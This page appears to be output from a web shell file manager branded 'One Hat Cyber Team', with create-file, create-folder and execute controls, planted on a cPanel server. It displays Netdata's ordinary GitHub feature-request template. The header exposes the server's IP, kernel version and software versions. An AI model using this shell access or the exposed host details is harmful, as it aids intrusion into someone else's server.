⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.23
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software:
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
local
/
src
/
netdata
/
.github
/
ISSUE_TEMPLATE
/
View File Name :
FEAT_REQUEST.yml
name: "Netdata Agent: Feature request" description: "Submit a feature request and help us improve our free and open-source Netdata Agent" title: "[Feat]: " labels: ["feature request", "needs triage"] body: - type: markdown attributes: value: "### Thank you for contributing to our project!" - type: markdown attributes: value: | Submit a feature request and help us improve our free and open-source Netdata Agent. - type: textarea id: problem attributes: label: Problem description: | Is your feature request intended to solve a problem? If so, provide a description of the problem. validations: required: false - type: textarea id: description attributes: label: Description description: | Provide a clear and concise description of the feature you want or need. validations: required: true - type: dropdown id: importance attributes: label: Importance description: | Help us to understand the importance of your feature request. Choose "blocker" if lack of this feature stops you from using Netdata Agent. options: - "nice to have" - "really want" - "must have" - "blocker" validations: required: true - type: textarea id: value-proposition attributes: label: Value proposition description: | Help us to understand why we need this feaure. Describe benefits that users receive if we implement this feature request. value: | 1. 2. 3. ... validations: required: true - type: textarea id: proposed-implementation attributes: label: Proposed implementation description: | Share your proposal if you have any ideas on how this feature can be implemented. validations: required: false